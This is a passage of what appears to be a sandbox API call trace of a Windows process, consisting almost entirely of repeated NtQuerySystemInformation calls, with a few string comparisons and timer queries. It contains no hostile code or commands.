(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd320, Length=0x38, ResultLength=0x0) [0231.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1a0, Length=0x20, ResultLength=0x0) [0231.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x20, ResultLength=0x0) [0231.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x20, ResultLength=0x0) [0231.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd790, Length=0x50, ResultLength=0x0) [0231.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd790, Length=0x50, ResultLength=0x0) [0231.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd790, Length=0x50, ResultLength=0x0) [0231.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd680, Length=0x50, ResultLength=0x0) [0231.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd680, Length=0x50, ResultLength=0x0) [0231.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd680, Length=0x50, ResultLength=0x0) [0231.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd680, Length=0x50, ResultLength=0x0) [0231.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5b0, Length=0x38, ResultLength=0x0) [0231.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3e0, Length=0x28, ResultLength=0x0) [0231.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3e0, Length=0x28, ResultLength=0x0) [0231.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3e0, Length=0x28, ResultLength=0x0) [0231.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3e0, Length=0x28, ResultLength=0x0) [0231.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd450, Length=0x28, ResultLength=0x0) [0231.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5b0, Length=0x38, ResultLength=0x0) [0231.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4d0, Length=0x28, ResultLength=0x0) [0231.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4d0, Length=0x28, ResultLength=0x0) [0231.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd370, Length=0x20, ResultLength=0x0) [0231.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2f0, Length=0x20, ResultLength=0x0) [0231.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2f0, Length=0x20, ResultLength=0x0) [0231.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2f0, Length=0x20, ResultLength=0x0) [0231.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5b0, Length=0x38, ResultLength=0x0) [0231.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5b0, Length=0x38, ResultLength=0x0) [0231.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd430, Length=0x20, ResultLength=0x0) [0231.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3c0, Length=0x20, ResultLength=0x0) [0231.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3c0, Length=0x20, ResultLength=0x0) [0231.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd728, Length=0x50, ResultLength=0x0) [0231.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6a0, Length=0x28, ResultLength=0x0) [0231.188] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0231.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd728, Length=0x50, ResultLength=0x0) [0231.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd728, Length=0x50, ResultLength=0x0) [0231.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd610, Length=0x50, ResultLength=0x0) [0231.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd590, Length=0x28, ResultLength=0x0) [0231.190] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0231.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd610, Length=0x50, ResultLength=0x0) [0231.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd610, Length=0x50, ResultLength=0x0) [0231.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd610, Length=0x50, ResultLength=0x0) [0231.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd540, Length=0x38, ResultLength=0x0) [0231.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd370, Length=0x28, ResultLength=0x0) [0231.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd370, Length=0x28, ResultLength=0x0) [0231.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd370, Length=0x28, ResultLength=0x0) [0231.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3e0, Length=0x28, ResultLength=0x0) [0231.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd540, Length=0x38, ResultLength=0x0) [0231.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd460, Length=0x28, ResultLength=0x0) [0231.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd460, Length=0x28, ResultLength=0x0) [0231.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd540, Length=0x38, ResultLength=0x0) [0231.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3c0, Length=0x20, ResultLength=0x0) [0231.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd340, Length=0x20, ResultLength=0x0) [0231.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd340, Length=0x20, ResultLength=0x0) [0231.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd340, Length=0x20, ResultLength=0x0) [0231.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd540, Length=0x38, ResultLength=0x0) [0231.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3c0, Length=0x20, ResultLength=0x0) [0231.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd350, Length=0x20, ResultLength=0x0) [0231.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd350, Length=0x20, ResultLength=0x0) [0231.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.206] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc7520fd670 | out: lpSystemTimeAsFileTime=0xc7520fd670*(dwLowDateTime=0xeb160ba7, dwHighDateTime=0x1d5fb6e)) [0231.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd728, Length=0x50, ResultLength=0x0) [0231.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd660, Length=0x28, ResultLength=0x0) [0231.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x50, ResultLength=0x0) [0231.206] GetTickCount () returned 0x117a599 [0231.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd448, Length=0x58, ResultLength=0x0) [0231.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd360, Length=0x38, ResultLength=0x0) [0231.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd190, Length=0x28, ResultLength=0x0) [0231.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd190, Length=0x28, ResultLength=0x0) [0231.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd190, Length=0x28, ResultLength=0x0) [0231.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd190, Length=0x28, ResultLength=0x0) [0231.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd200, Length=0x28, ResultLength=0x0) [0231.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd360, Length=0x38, ResultLength=0x0) [0231.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x28, ResultLength=0x0) [0231.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x28, ResultLength=0x0) [0231.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd360, Length=0x38, ResultLength=0x0) [0231.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1e0, Length=0x20, ResultLength=0x0) [0231.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x20, ResultLength=0x0) [0231.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x20, ResultLength=0x0) [0231.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x20, ResultLength=0x0) [0231.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd360, Length=0x38, ResultLength=0x0) [0231.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1e0, Length=0x20, ResultLength=0x0) [0231.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x20, ResultLength=0x0) [0231.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x20, ResultLength=0x0) [0231.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd448, Length=0x58, ResultLength=0x0) [0231.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd320, Length=0x38, ResultLength=0x0) [0231.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x28, ResultLength=0x0) [0231.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x28, ResultLength=0x0) [0231.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x28, ResultLength=0x0) [0231.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x28, ResultLength=0x0) [0231.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1d0, Length=0x28, ResultLength=0x0) [0231.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd320, Length=0x38, ResultLength=0x0) [0231.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd320, Length=0x38, ResultLength=0x0) [0231.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd250, Length=0x28, ResultLength=0x0) [0231.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, 